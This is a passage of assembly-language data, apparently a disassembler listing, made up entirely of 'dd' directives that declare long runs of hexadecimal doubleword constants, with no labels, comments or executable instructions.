		dd 9014D206h, 0F20882Ch, 0BD1B67B2h, 4FA10A5Dh,	958D8D36h
		dd 0DA5CC808h, 0B47C0C0h, 5DA2E5B5h, 522781B2h,	2A3088CAh
		dd 6AA0AF66h, 0A602248Dh, 0A8A334DDh, 1415FAA4h, 83A3511Ah
		dd 536436CDh, 4B54518Dh, 535A5C3Ch, 21F03EB7h, 0A4179B01h
		dd 194A67EAh, 6712A00Bh, 0A4488008h, 11FAD025h,	95B3821h
		dd 0CC141384h, 360AB8B8h, 0AC4653A8h, 5D69E0Bh,	2EE5D114h
		dd 0AE924C9Dh, 61450ECBh, 61A0D118h, 92022201h,	380237BEh
		dd 0EA86EFEh, 7F03A1B5h, 2AC055D8h, 8D143866h, 0E1B6C2C2h
		dd 0CE220CCCh, 1A242956h, 33AAB651h, 0B05AE810h, 5260DEB8h
		dd 18E06501h, 132CCE43h, 48BE1ABEh, 0DC04A1B5h,	71C4BD49h
		dd 0E8246E0Ah, 0E943C04Eh, 281B49E8h, 3D7AACAFh, 0E2915594h
		dd 4404288Fh, 9DEF26E1h, 49013B48h, 31B523F7h, 94047BADh
		dd 4A826695h, 5231943Ah, 82E85564h, 4511EB97h, 7AE23B83h
		dd 0D36348Ah, 0BA9A0A2h, 0EDA589C3h, 3FD3106Dh,	82F87C25h
		dd 4BA18D44h, 52714FEh,	0C0B28580h, 5004C81Ah, 0AF81D949h
		dd 0B0A4CD65h, 22662C39h, 91F55554h, 2400DE2Bh,	0BD62969Dh
		dd 272543BFh, 0FC1FD64Bh, 72A23510h, 0F01695D2h, 60919AB4h
		dd 280A3A5h, 0F85A8916h, 1B9ED98Bh, 4C7010Bh, 0A898C66h
		dd 19BF7623h, 14A9755Dh, 370D250Eh, 61C4BF54h, 0A0C150FFh
		dd 0A2EF5412h, 1143D58Ah, 4B3AC2BFh, 5F128928h,	0C6E76DA5h
		dd 0BF547630h, 0BA241D54h, 22080D0Ch, 0CD90302Fh, 2176B15h
		dd 41BCCC46h, 50639145h, 0BE7D6A51h, 3FA02318h,	5F23A3DBh
		dd 8A18ACFAh, 3D70EA82h, 0CC1DBAECh, 78E12536h,	19AF37F8h
		dd 63811C0Fh, 280C50D3h, 2CBDE920h, 655290FCh, 0F105C69h
		dd 2127979Dh, 76E8D949h, 0D73F6AE3h, 0A1F25355h, 3D74C8C3h
		dd 3091D140h, 88A53552h, 0DD0DE4A3h, 2291E478h,	26D5C84h
		dd 3330469h, 0C21B78A0h, 3BA7A20Bh, 0C284947Eh,	0A6073B99h
		dd 0C94071D8h, 788182D5h, 0FFEE31F9h, 13833D3Fh, 524FFE9Ch
		dd 791810Ch, 0EBB438D8h, 0D68CD1E0h, 0D1E1EA22h, 0EC55247Dh
		dd 0B6377A28h, 0BC2B2E5Bh, 1F645924h, 0FC2E4718h, 3C652204h
		dd 0CBB0ECh, 611217D0h,	5330A3E4h, 0C5498B80h, 1D6BC2BAh
		dd 0C5C48474h, 0F13346C1h, 63CD3EB3h, 0A253FFADh, 0A91542Ch
		dd 1E541130h, 0B69B540h, 5328FE39h, 35B8E947h, 75E859DEh
		dd 511C4423h, 0A22B845Fh, 0B7E42B35h, 8A72800h,	949C4D27h
		dd 7D6FC193h, 0AB7B026Dh, 829A12BCh, 2B262D4Ch,	5360A37h
		dd 7B0AF630h, 5B1AB945h, 33E67EABh, 2F10DB69h, 8B88A809h
		dd 0E278A607h, 0B1E10415h, 0CF51FC97h, 8DCCA080h, 23581BA0h
		dd 9C0046E4h, 0ACC43C48h, 0D6131F4h, 0D0FA9C78h, 9D45F6FAh
		dd 9D687A3Eh, 4BE98F9Ah, 7318B005h, 827A96FAh, 0E8B5FD6Bh
		dd 4F5C7C24h, 2AC261D6h, 86A977AEh, 58172D3Bh, 0D8F5DE97h
		dd 0EE44CF86h, 366B29Ah, 3430D85Eh, 617BDC6Ah, 624E162Ch
		dd 22D879AEh, 2960725h,	0E8215E1Ch, 997882D4h, 74897321h
		dd 94A2A321h, 16911B33h, 0C1C28106h, 631370BAh,	8FC986ECh
		dd 31440675h, 0B1C0DC17h, 6380758h, 0BEEAD562h,	0B1F695BEh
		dd 20577640h, 0D02A05Ch, 1F558A6h, 7081E31Bh, 4101C2B1h
		dd 59D469A0h, 4C78D9A4h, 1FB6D19Dh, 691BB55Eh, 0FF38363h
		dd 0C0CBFA36h, 7919BBh
		dd 0DE777024h, 7FF40AC6h, 81D6F423h, 57B4E0Ch, 596AB843h
		dd 0D9E555F9h, 0C0E1F70Dh, 8F82220Eh, 64CF5501h, 0AEC254CDh
		dd 0E031B739h, 0AA602EB2h, 2316BEE4h, 6AA70DC7h, 8A717E27h
		dd 293E194Fh, 0BF835DFEh, 87F762E8h, 597F960Bh,	9D3370E7h
		dd 8646FEAh, 75957798h,	0EDEBEFF7h, 0FF09B1B2h,	29751E43h
		dd 0D552CD62h, 0B2E586D5h, 9A55FDA9h, 0F3577AA4h, 5F078160h
		dd 2F918A51h, 818B7981h, 107492A0h, 0A28F3A09h,	0B61D71ECh
		dd 0D2953BF9h, 0B997F02Bh, 1614956Fh, 0BE4B0A6Ah, 933F2BF5h
		dd 6A47F916h, 0FD30B4E6h, 4E312A4h, 0D560322Fh,	7F1AED2Eh
		dd 61210669h, 772B2F23h, 4B430CBAh, 5594D5DFh, 635D2559h
		dd 0EA84543Bh, 3085242Ah, 2E186A28h, 8284EACAh,	43054EA8h
		dd 0D5A94451h, 0B5A142Eh, 0DF02F715h, 442EE9CBh, 3F5530F8h
		dd 0F597D286h, 0A3AA1BA8h, 1BF550D3h, 0D4B057CAh, 1402F7BEh
		dd 0ED444F51h, 0C9F2EF5Ch, 428935F0h, 44F5B748h, 7C071DCDh
		dd 103EEE66h, 0F49DB645h, 7D88308Ah, 0DFA61B03h, 34C101D5h
		dd 0C9D7A24Bh, 61D15655h, 0B516A9D8h, 250A5132h, 8BCDB456h
		dd 550E9A29h, 0E77D8DE1h, 55FEC2C6h, 5419F87Eh,	2AE0611Bh
		dd 0A8FB7660h, 0BA990CCCh, 9C85011Eh, 0EEB69E9h, 2BD00C8Ch
		dd 6D5938B5h, 7F8B35FFh, 3C8C4DFh, 5F008276h, 21780514h
		dd 0F3077E5Dh, 9EBABB9Fh, 6AADEE84h, 0E3D1F93Dh, 0F951A616h
		dd 939B5746h, 0A2CA692Dh, 9C62EF81h, 0E5F59AA8h, 14C5314Ah
		dd 0E474907Ah, 0E1B4FC1Fh, 0D0622DE0h, 0FBBD08D0h, 97928B1Dh
		dd 154F59E1h, 2634E502h, 40BC5690h, 7F51DF29h, 38E5D369h
		dd 2422E453h, 5140AEC1h, 0CA92E921h, 3B3662CDh,	5DE0862Dh
		dd 0A5AAFD40h, 514A65A9h, 0A8BCF8D3h, 99EC838Fh, 0B618635h
		dd 5DEEA106h, 2D3E1E82h, 68803617h, 0FF17558Ah,	0FC2BA462h
		dd 45E48D7h, 63D72F0Bh,	0E6FA0C44h, 57FA0C0Ah, 0A9644339h
		dd 8DFD24E3h, 6A45DE91h, 75142AE7h, 87502AD5h, 0DC8DA503h
		dd 0A2D56052h, 0C145A35Ah, 0ECA5EC4Ch, 0A7F91D94h, 0AAD32100h
		dd 8949E02Ch, 0E3DC8439h, 0AF501288h, 96FFA7AFh, 0F49652D9h
		dd 2D8CB332h, 0E5811345h, 0AC25F04h, 998CFC40h,	387508B6h
		dd 71E65401h, 5FF33C5Dh, 8211C2AEh, 0CA84C783h,	0FACD981Bh
		dd 68A399C9h, 0AE5BEF51h, 0B22A5592h, 23F04132h, 56721478h
		dd 50507133h, 42D64CE6h, 0E3D17D70h, 688B7128h,	0D737D5C1h
		dd 99995F33h, 91905F6h,	22086C37h, 8CCCEC4Dh, 0C0D7FF23h
		dd 0A8A02B0Fh, 1041433Ah, 498A0AC0h, 0ECE32AF7h, 0F5740564h
		dd 84617E28h, 2AEC728Ch, 8966D4ACh, 8500E582h, 0C3D818C5h
		dd 77966955h, 289770B0h, 0FEE2C9A0h, 56F2484Fh,	0E82AA7C2h
		dd 0D60B0862h, 370A9805h, 0B32BB8CAh, 0B5462BA5h, 5726B193h
		dd 3D76A755h, 0BD48EF86h, 8937FD4Bh, 0BA2E0B3Dh, 88DC189h
		dd 0CBB49888h, 0BE19244Eh, 0FBD85972h, 791FEFCAh, 6E0EDB5Bh
		dd 4A4D287h, 59B9B0DBh,	45AEFEBh, 6CEAD2B7h, 1C680422h
		dd 24EEAE3Ah, 54B31933h, 0ACEE5105h, 52EB9714h,	0D1A205B1h
		dd 513C17C6h, 0E0FE00BAh, 0C6C3B2Bh, 937E055h, 6747F330h
		dd 0A1D16F35h, 0D5D2F01Dh, 82BEC4CDh, 91A92CABh, 0F94B8DA2h
		dd 0DAC5E749h, 4279AB6h, 0E9CB5AD5h, 0C1202010h, 85FBB82Ch
		dd 5DB7A0A5h, 8C5607B8h, 3C1C916Ah, 12BDCh, 0CB4599F3h
		dd 0E01C3B0h, 0ED5FE1CAh, 0C6A5CF5h, 1A870270h,	0A9EA5967h
		dd 0E332161Ch, 556316Ah, 56D03888h, 0B97D10BBh,	0BE004062h
		dd 691CFB11h, 4B470856h, 8A0135C1h, 9AB1A0C2h, 9440B742h
		dd 2409FD44h, 3188D1EDh, 0C6E1D072h, 2B805BDEh,	0DF0A006Bh
		dd 52F44AEh, 36335D6Fh,	410B74Bh, 0E5112BA0h, 101CC6h
		dd 10B2ABB7h, 0B6D9A2DBh, 0FC2EDA10h, 717B3398h, 0BD086017h
		dd 26195D62h, 947D8034h, 83DC49Ah, 3F58600h, 6AA8B5C8h
		dd 312C03F9h, 0AF0306h,	16B66D17h, 0D87652F0h, 82F070FCh
		dd 470140Fh, 1809EAFCh,	0FC540733h, 5A049D4Fh, 0E014BAECh
		dd 283EE285h, 5198673Ch, 0E94341C0h, 0C2D54961h, 0A925A940h
		dd 1AC00210h, 0BD066D0h, 0EED9C8h, 0DA2889FAh, 76072F1Ah
		dd 395EA65h, 588C8BA8h,	161D4504h, 89A05019h, 7E066554h
		dd 42DA75D3h, 6E154645h, 728BA6ABh, 0AB790006h,	570F9CD2h
		dd 7DCC049Eh, 33D739A5h, 5BF24102h, 16546573h, 511A8A89h
		dd 0A688E2Eh, 35CB399h,	0B49875EEh, 0A415155Ch,	9E004697h
		dd 2C155B64h, 0AA8FF35Ah, 0AC74873Ch, 2C521E03h, 7655026Dh
		dd 0E8A7B2E0h, 0F8306F48h, 5E012260h, 5F639A89h, 94FF5A80h
		dd 1B5D4FAh, 3680A50h, 0D50767C2h, 0CEABA429h, 2E29DD47h
		dd 10D6918Ah, 3485334Ah, 87B090CDh, 3A1E4144h, 6C7D68E6h
		dd 50CF328h, 0FB48A0BBh, 58CEE80Eh, 76A0337h, 955D0E1Ah
		dd 8BD2BCD0h, 0A9EBFDA2h, 655E69C6h, 88F8AB35h,	0E4310CC2h
		dd 0AB86A98Eh, 87743F29h, 559EE4EFh, 7B39EE3Eh,	10548C6Fh
		dd 899E052Fh, 795299A1h, 571F454Bh, 20A98303h, 482A9642h
		dd 7195282Ch, 12CC4B3Bh, 0D0062567h, 0E456C228h, 0A31926BBh
		dd 0EEB8F02Fh, 0E23CFB56h, 0D18A7758h, 5E42D24Ch, 277F29CFh
		dd 0BA75A47Ah, 711E30ABh, 961280E2h, 62560B3h, 760ABAABh
		dd 3097AA51h, 2F9F841Eh, 7EEBAF94h, 5EB5C9C4h, 45F82065h
		dd 0E353459h, 0ABC3542Dh, 9A3540B3h, 0ACF1AC0Ah, 0DF364DEAh
		dd 7E955DA7h, 2CA414E6h, 0ED8A7BBAh, 0AA025669h, 907C96h
		dd 0B7A2A80Fh, 0E9B822D5h, 0AC2122DAh, 0A0B6454Bh, 9463AB79h
		dd 2B1D6D7Dh, 522A96D4h, 0EA6230B8h, 0AC346CECh, 0CB5F4382h
		dd 3432D1AAh, 0C2E9DF6Ah, 14B5810Fh, 0CE0F8384h, 12E6FDFAh
		dd 0E764F03Ch, 13900C62h, 0F162499Ch, 30185C6Ch, 4F044156h
		dd 0C0947207h, 0FEB87ED7h, 0A14B40E0h, 0ED402EE3h, 0EEB469A3h
		dd 0FF30925Fh, 29355645h, 0F61B1745h, 0ADD68A29h, 5ACE6C70h
		dd 0F18D461Fh, 8109D62Fh, 458958BBh, 0D6DC61D1h, 28C44656h
		dd 0B28B108Eh, 8AEE563h, 488ACFC5h, 4969309h, 0F687306Ch
		dd 81E09E4Fh, 0D2620323h, 8B34F0F3h, 7FFE20C3h,	0E4484BD1h
		dd 0A5F4DFA3h, 0CA36F0D7h, 2F4329Bh, 5345D59Eh,	0DC5DD3B9h
		dd 28B7455Bh, 752F0ED2h, 0B9FBE2Ch, 0E00F4D1Eh,	0AE8F8BCCh
		dd 0BBD42F4Dh, 6044F18Ch, 0CC498914h, 0A6FD081Ah, 1EDEEE4Ah
		dd 0DEE15B43h, 1ED30F72h, 5CA19A7Fh, 19BA469Fh,	7AB62C3Fh
		dd 91D84DDEh, 6A972AB1h, 0B5B0022Bh, 84A698F3h,	8289D034h
		dd 238B817Dh, 1D006FAEh, 4173A347h, 37E3C855h, 0CC565B1h
		dd 3E5AE019h, 228AF0DAh, 0D788F6ECh, 3B4162A2h,	0C5A8A8BFh
		dd 4132AB90h, 96BEABA1h, 0F00A70A7h, 9708EBEFh,	717D8CF7h
		dd 5ADC76ADh, 54A57D5Ch, 24A178A7h, 562CDD51h, 148011F8h
		dd 6C14341Eh, 0A470A1DCh, 55A01B20h, 30A71C19h,	90D3AE5Bh
		dd 0E7CA81D1h, 0CBC1AC5Fh, 0AF9434D9h, 1301C210h, 8219A417h
		dd 0AAE22751h, 0F7B553DFh, 542F5D66h, 4E6F8256h, 0A77BFC9Ah
		dd 9B70B0CBh, 0A92E72A6h, 53BD54C1h, 0D354CB0Ch, 0B443D0EEh
		dd 37D9E047h, 6922F145h, 8735F28Eh, 1563AABFh, 12117C68h
		dd 0B449F47Dh, 1664B4Ch, 4205F294h, 3F08ADC2h, 585F7879h
		dd 0B3E4A36Dh, 4517B5D0h, 0B3E4C715h, 74A78C6Ah, 9FC9CF15h
		dd 0AC26212Eh, 0E56F8187h, 0BEF92836h, 66EECD83h, 0B85308DDh
		dd 9561041Eh, 0A4C8E3D2h
		dd 8345D57Ch, 972242E3h, 0E3349B95h, 7C4CEF62h,	0A3F60755h
		dd 18941AB2h, 0C09E3475h, 4D60A70Eh, 5DE43D0Fh,	0A9888D1Dh
		dd 37E54D1Ah, 0A622DC29h, 0CA3272C8h, 0FC30CCFCh, 43F16C6h
		dd 73C27FDFh, 88340F9Fh, 9E2A3F1Dh, 4A2624F8h, 75748143h
		dd 513B2FFBh, 778DEB8h,	0F1855478h, 3D661735h, 42A000A7h
		dd 0B5116D93h, 4EFD222Eh, 262D7587h, 6B2D748h, 0A8174F82h
		dd 6283C940h, 0AA388F02h, 7C67242Eh, 1E0A4727h,	0FA3E4D70h
		dd 0F298341h, 299C0F8Fh, 74DBE7F8h, 5724376Fh, 2C33805Eh
		dd 0DAAD398h, 90DA1C07h, 0B75D57EEh, 0B83AAAE0h, 899C703Eh
		dd 0ED88806Dh, 0A011303Ch, 0AC328AB4h, 0E4027595h, 805C1890h
		dd 8455C731h, 6C54795Ch, 6722EA75h, 585B45FCh, 60260AEDh
		dd 1BA4CDDCh, 4C5014B4h, 7C6FB83h, 0B857F41Fh, 0F84880CEh
		dd 419848BAh, 2175434Fh, 257C3485h, 6C26F98Ch, 0FA4D4E38h
		dd 917B14BAh, 9E47F7Bh,	110D0C0Bh, 975DBA4Ah, 0C0C4EB8h
		dd 62CF1AAh, 1F043663h,	0F7FDDFFCh, 0C80D114Dh,	9E77AB0h
		dd 0E5C6DC57h, 81AF82BBh, 0C701D1CBh, 731B0F17h, 0D6F8A690h
		dd 924242FFh, 62C865B4h, 998A200Ah, 146A0381h, 1F015E51h
		dd 0F6FB3B1Ch, 0E90A757Ah, 0C542F09Fh, 0C7A3E915h, 9EEFB066h
		dd 1615966Bh, 0B85F5F15h, 8BE12EBEh, 710A62AFh,	1985F07Ch
		dd 614BB012h, 0DCFB6FC6h, 703F41F8h, 0CE0FCCF9h, 2C4813Fh
		dd 793EE2D1h, 413081DEh, 30123072h, 0B1C93E12h,	5D3A45AEh
		dd 4C90280Fh, 6119688Ah, 0E257837Eh, 0B6DCC019h, 2FE4ABF5h
		dd 0D177B174h, 799FE8B5h, 3B6EB72Fh, 0FA01959h,	0C60A5E7Eh
		dd 0BDC4A94Ch, 753D2A09h, 0B86BA0C9h, 0FE0E7960h, 0FEA64C2Dh
		dd 1460101Dh, 5F0B7F11h, 0E1326865h, 566CC987h,	0BB8842E3h
		dd 8CD683B2h, 922997DFh, 7D3808A3h, 0B5DEF670h,	72755C1Dh
		dd 10A380BDh, 2C53139Bh, 94F499C7h, 392FD384h, 0EBE5BB83h
		dd 0A0C162A2h, 7F0F0E00h, 0E913D7FAh, 75461C0Eh, 0B5D1627Ch
		dd 6122E4F5h, 0C4E1ED74h, 0E17D15B1h, 322CFDF8h, 0BA42748Bh
		dd 2C5DD585h, 2D88082Ch, 26A07D42h, 0BF60B975h,	5840EE1Bh
		dd 62E0CC0Eh, 0BCD6E62h, 0A7509104h, 0A0D0D677h, 858950D5h
		dd 161A3E82h, 0A542C235h, 2C398826h, 19A346EEh,	2594B16h
		dd 0C860CA36h, 2285FF18h, 7AE31101h, 11A5A078h,	2987181Fh
		dd 1A09BA80h, 0ADB2445h, 7A4A33E9h, 7A83AC06h, 0E326C2BAh
		dd 0D4DA07E0h, 0FC24FE9h, 651A3629h, 0AE92DDDCh, 9A8FD947h
		dd 3E0758AEh, 0C3A4215h, 0E8EA68C0h, 59D88ADDh,	6EE16900h
		dd 0CF56778Ah, 1687C83Fh, 4A6DB219h, 7ECEEDB9h,	0F1A9923Eh
		dd 685E03D2h, 72112A41h, 3AD6D857h, 255718A3h, 1C8E285h
		dd 2C04A985h, 1EB86886h, 546A5423h, 81052A84h, 67DB858Ah
		dd 8312E7C2h, 0C0FC5F3h, 154C87D3h, 81D9740Fh, 0B17D9AB6h
		dd 1B2BAF8h, 80DDA6BCh,	0F811642Ch, 61440E9h, 0E943432Bh
		dd 0D8E72C04h, 44E023C6h, 7F981A04h, 59749B53h,	9FAE9140h
		dd 8CD295F0h, 2CFD6AFCh, 0A069AA00h, 3A58848Bh,	8B83BE3h
		dd 0D8BAE2E8h, 0DF82AA1Bh, 27730430h, 0F82420BEh, 0FFF17232h
		dd 0C1481AC2h, 4B122A9Ch, 7F60637Ch, 47D98AE9h,	245FEFB1h
		dd 8AEC4493h, 0BEF45E05h, 280E7859h, 0C0EF6861h, 82A24EFh
		dd 403E7EE9h, 3BB675FEh, 20119EB8h, 15871046h, 890B81F0h
		dd 1F150695h, 0C4EAA504h, 8B886A10h, 0ADCF1F8Ch, 261F0CEDh
		dd 0D16CDAFEh, 1B558337h, 0D94BC3BAh, 67E7FFCh,	0A4A20E8h
		dd 480C1A61h, 0F4F46FD0h, 1F22F89Dh, 4316AD76h,	0BBB40782h
		dd 0F4B9311Eh, 0C17EEBBh, 2E90525Ah, 552E46ECh,	0D52795FCh
		dd 9CDA6DBh, 0F577451h,	546A2550h, 0E55840FCh, 9A8DB930h
		dd 0BF0DAA7Fh, 0D280B914h, 43B11B67h, 0CF5CD145h, 0B854290Ch
		dd 0AC83A02Bh, 2164C065h, 79704625h, 2046FE11h,	2D99A682h
		dd 28B36220h, 85ED52CDh, 4E513659h, 3D73AC24h, 0C09C0E45h
		dd 21EE1512h, 0F4737650h, 2CDE8593h, 0D80B8A2Eh, 0E5E40489h
		dd 3882145Ch, 2C6B540Dh, 8AA156A2h, 0CFE0A318h,	0C906FE7Ah
		dd 0AF86E9D0h, 10F52CBCh, 0F406DBC9h, 0C524F080h, 68113DEAh
		dd 0C57E114h, 0BEF57622h, 0A0A96213h, 0FE31D256h, 45DB1431h
		dd 1B8240Fh, 0FA29905Eh, 12E2CED7h, 544D6CDh, 0B5FB173h
		dd 0F9CE62E9h, 697BE936h, 0A34FF17h, 0E9AF673Bh, 75C4611Ah
		dd 7F4262C4h, 11171280h, 2AD07559h, 0A6BE8CE5h,	60D8ED5Eh
		dd 0B52610A9h, 225E8CCAh, 19CB9638h, 0A25CBC43h, 6A2CC823h
		dd 962AC089h, 0A303E897h, 9D563A22h, 4BAE2EE0h,	703075E8h
		dd 0FFCBA832h, 0F2DC7C9Fh, 0B7BE5C5Bh, 0FBDC245Ch, 0A931053Bh
		dd 220CE218h, 0F310383Eh, 3D7E4E4Eh, 0ABC0905h,	5AA1CC5Fh
		dd 68A2B9E6h, 22AF4B9Dh, 0A47B7273h, 867E9C37h,	7C226C82h
		dd 2ED67B98h, 0EF6216B1h, 0BAB9B537h, 38258486h, 0ED12482h
		dd 5AE4970h, 0CCF284F4h, 0C5C1B0FEh, 7E04966h, 0F82A0043h
		dd 506BFA1h, 18BEA9B0h,	3357168Ah, 0B317B23Fh, 780AE0B5h
		dd 43C9445h, 0FC21A488h, 4D008011h, 0C00173E8h,	17C052FDh
		dd 0AE820AA4h, 56A50CFFh, 0AE941D3Eh, 0FE167416h, 0CBE8C9EFh
		dd 0F9470397h, 0C42F247Ch, 2CEB2650h, 9DD1F0B0h, 81643E10h
		dd 7B3331E1h, 40DABBFFh, 189ABAF6h, 18BE4522h, 1450A35Ch
		dd 23A1AEh, 6CAB0961h, 0F908042Ah, 0B4126424h, 3D3D805Fh
		dd 5C188258h, 40D28438h, 641130BEh, 4221928Bh, 466B2D83h
		dd 67E264BEh, 802A1C86h, 0A3BD05Fh, 58328DCFh, 413CD002h
		dd 0C4E51543h, 0E2AD11B5h, 0B0CA074Dh, 6AF7253Ah, 0BEC70A2h
		dd 19E8E62Fh, 8D32018h,	599E1A50h, 4B86B57h, 1F548678h
		dd 1C521DC0h, 3D1828AAh, 210A2070h, 0EE804A16h,	0BB135006h
		dd 0C47530Eh, 0FB497DAAh, 0F071A0BFh, 6AD5F9CAh, 0C16864F8h
		dd 71AC05AAh, 5907AC2Fh, 5092EF57h, 0BFCA63F3h,	2BD5C51Dh
		dd 0F8E839F7h, 0FA60C477h, 4979427Fh, 0B6A8F310h, 0D9334921h
		dd 34AB9072h, 133E9595h, 85A0375Bh, 1987AB03h, 1C16255Dh
		dd 0D24145A2h, 17467087h, 0F9D581E3h, 0FDC05743h, 21D8BEE2h
		dd 86601884h, 0FBF92F7Eh, 52D87CFFh, 8307122Ch,	5D20BBAFh
		dd 7915FE81h, 3F4DD81Eh, 0AE5D294h, 0EC400A4Eh,	99AECD55h
		dd 28D1F858h, 54E4617Bh, 34DE800h, 0D4F73748h, 42A74A00h
		dd 667D3893h, 0A964005Eh, 0CB40BA1Bh, 5471942Ah, 66F508Bh
		dd 4788A770h, 680A5950h, 10E22DDh, 0C97AC22h, 6967B73Eh
		dd 9686D423h, 68E3A395h, 18A73489h, 86F6190Ah, 77377539h
		dd 0B2699851h, 0D1D01309h, 25308033h, 0F384023Ch, 7A8374B3h
		dd 0F09AE90h, 365911E5h, 0D3785DDEh, 1DAA0FDBh,	0A8BB1EB8h
		dd 85271559h, 9797896h,	4418501Ch, 529EFAEh, 636832DEh
		dd 2DBA4830h, 0B1743300h, 46EFF5CBh, 9A6F5F61h,	51042138h
		dd 853852A1h, 94DEDE79h, 0AC9AAC5Dh, 0DA9427A5h, 943C3182h
		dd 13764E4Ah, 0ABFDE625h, 66810E02h, 0B11FFAD6h, 2DD63770h
		dd 3592F87h, 9619A4A9h,	0F057602Eh, 0D62A04FBh,	36BC3990h
		dd 98440383h, 0E0AE0953h, 0E87BBAFBh, 62E086C8h, 0CD398C0Eh
		dd 3013BA5h, 3D187347h,	0A38C733Fh, 25EC4FD6h, 0A95C1D13h
		dd 980E3249h, 40BDD148h, 6D04B9CAh, 4AD67CDCh, 0A3FCC0CDh
		dd 516F5E00h, 0F38B8B7Fh, 9565E273h, 0B59D2B64h, 0FC369742h
		dd 0F9E9F7E1h, 19449B88h
		dd 49F55B4h, 0D0D7C2BEh, 20B2CAF5h, 5033D88Ch, 0D1F2B57Ah
		dd 7E003015h, 43C0FFDDh, 0AC4B19E4h, 6282A561h,	0A98692EAh
		dd 80515351h, 0B8EB8E0Fh, 0D772B21h, 61175D34h,	296DAA70h
		dd 194F79A0h, 0B6181DCBh, 0CE1EFF82h, 300558Ah,	1F80924h
		dd 0AA22DE0Eh, 339F0C49h, 214AA180h, 0A710892Dh, 0AA1B11DDh
		dd 0FCD4030Eh, 0C053A12Ah, 6C425B5Fh, 941307E0h, 51969A30h
		dd 4ECE484Fh, 7564400Fh, 71EC941Bh, 41A139A2h, 63144053h
		dd 47DEA205h, 0C7345C30h, 31B9447Bh, 552855CBh,	778720CDh
		dd 2AD42F2Dh, 742256FEh, 5E13B15Ah, 0AB2B67CEh,	19041FCh
		dd 6424F300h, 0AD90C543h, 0A2F055F5h, 2A78931Dh, 2246164Eh
		dd 5D621BECh, 0ED26B94Ch, 0A6D05B8Ah, 0B29D8045h, 0B83FAC0h
		dd 1CBE55A7h, 9061B2F6h, 47FA3B98h, 0F05C7417h,	0F8FA3899h
		dd 17227D95h, 6B5DF22Fh, 0BA28CA84h, 0C0308859h, 43D197h
		dd 0F140145Fh, 0A5BF097h, 0B093700Ch, 2FD74E2Fh, 18283948h
		dd 0A89E289h, 1CC01C88h, 21D0F80Bh, 1B001888h, 0FA885793h
		dd 0F3482Ah, 13AA732Ah,	967FF98h, 0BDA2AD6Eh, 2CA12172h
		dd 0C496EA48h, 0C24F89D8h, 1A414EF5h, 6523B2CAh, 8D49F612h
		dd 20A60FE2h, 6B864850h, 51E1975Dh, 488852EEh, 0CE492CD7h
		dd 298C32F1h, 84ED15F2h, 8A02FAEDh, 0E1184BB9h,	0A23267FEh
		dd 440001B8h, 8D8FE5DAh, 7BC4BCBAh, 82160229h, 43409142h
		dd 0FD850A2Ah, 235BBB67h, 85A24301h, 0D16C1FCAh, 179146BBh
		dd 8B186766h, 92DC43Fh,	8901258Ch, 0D51F7205h, 0A8E3B969h
		dd 599971F1h, 0BD720977h, 0FBFE0BF7h, 9E4BDC1Fh, 14EA938h
		dd 0B5F023A7h, 3E082BC6h, 27342290h, 0F60B1644h, 82FC8825h
		dd 0A1253B6Ch, 795D5822h, 1F8729A2h, 8A7250D8h,	2946D4A6h
		dd 522D8612h, 0EBF03D30h, 10B709CEh, 0C8B0CBBCh, 62F4CEECh
		dd 2D4A838Bh, 6260823Eh, 0F661E15Ah, 403CA33h, 445128Dh
		dd 61DEB33Bh, 0CCC2FBA2h, 2E17F5C2h, 86D3276Eh,	0C4BA484Ah
		dd 5662DDE7h, 6761A705h, 8830204Ah, 8262AF75h, 84C8894Eh
		dd 635E7100h, 8DD26E07h, 479713BFh, 31FD1CFAh, 9A828404h
		dd 167A9BC6h, 4365D418h, 412AE5DEh, 7F33380Fh, 611B5FE2h
		dd 0A37D6F09h, 0A02BE0B2h, 11C41B6Eh, 37F0C166h, 0B23F40FDh
		dd 79B6E464h, 65E67A0Dh, 55A11F84h, 0AFC5C2A2h,	11C61BC9h
		dd 0E96CF203h, 0DE65121Dh, 71C8BB82h, 874842C8h, 0E8089457h
		dd 626564ACh, 450A28E5h, 0A3BE18BFh, 25CF7DD0h,	0D2786C8Eh
		dd 0EF187885h, 0F4881C58h, 0C31BCDFAh, 46AFB87h, 37483B9Bh
		dd 31D42A3Bh, 0E6A86D7Fh, 0C2675749h, 0B115828Fh, 953ACD5Ah
		dd 3BCF7286h, 9186A5F2h, 0B885D68Fh, 3556A7h, 224DD138h
		dd 93DD1DDEh, 6C647708h, 3F0A256h, 347757C0h, 5D6DEA2h
		dd 7508608Dh, 22592349h, 17B0D2DDh, 80AECC7Ch, 8E089285h
		dd 934D7300h, 3DC067A0h, 0F81A1083h, 0C16342C2h, 0EF49AAE3h
		dd 760A0062h, 0A1DA10h,	984A8C2Ah, 8028C001h, 0E1FC9901h
		dd 2EF4E224h, 0A72DA5EBh, 0DC49B819h, 6D1C005Fh, 5FF3DE92h
		dd 8D47403Ah, 7A756677h, 8F211347h, 0F4F32D11h,	0A10C622Eh
		dd 206260E7h, 2E4E4571h, 8A634AD0h, 2801F4FEh, 583F0D66h
		dd 0AF865D24h, 910A4138h, 3D03C45Ah, 0DC412D70h, 880C5A1Ch
		dd 8B4202B0h, 20644491h, 0DBD81122h, 58BFFB74h,	9A8D0B4Dh
		dd 387E81B9h, 52FCC57Ah, 801A62Eh, 1DBA4DFAh, 68869084h
		dd 37178C69h, 9388AC01h, 0C6C5059Dh, 6221A589h,	6DD7158Ch
		dd 0C747743Ah, 7CDBEF8Dh, 8A164397h, 6834098Ah,	7DA4C444h
		dd 2D2CE050h, 48E4E7D8h, 0CC0E9FB4h, 0AEAE151Eh, 0FB0A2D4Eh
		dd 6D17CFB2h, 0DF870D60h, 9EF6014h, 3106F43Fh, 86BF796Dh
		dd 0BE3D60B9h, 8AA2A813h, 0C0E3CBE9h, 0A41933Fh, 0E36B6141h
		dd 7EDB7495h, 87E7B8B8h, 0F1639001h, 54365AEh, 8683FC1Ah
		dd 41521B94h, 0EA1E75AAh, 50327C94h, 850E2A06h,	0FD502EBDh
		dd 56A0ABB2h, 0E656606h, 0FFBB3702h, 0CE674321h, 83082F56h
		dd 90ABDBA9h, 190C2CC0h, 429BB0FBh, 0A23196F8h,	4D2D8120h
		dd 5890D01h, 48870443h,	832179F9h, 0C06EEDE9h, 1A8F6E0h
		dd 218A90ECh, 152F3476h, 130C58ECh, 0A8925C44h,	19C45D22h
		dd 0A1420441h, 1C6C183Ah, 0B6FB7AE1h, 74DC2013h, 0E9F707Dh
		dd 3EB06E18h, 0E4CA69A3h, 17550D33h, 0C2434093h, 7D0298Dh
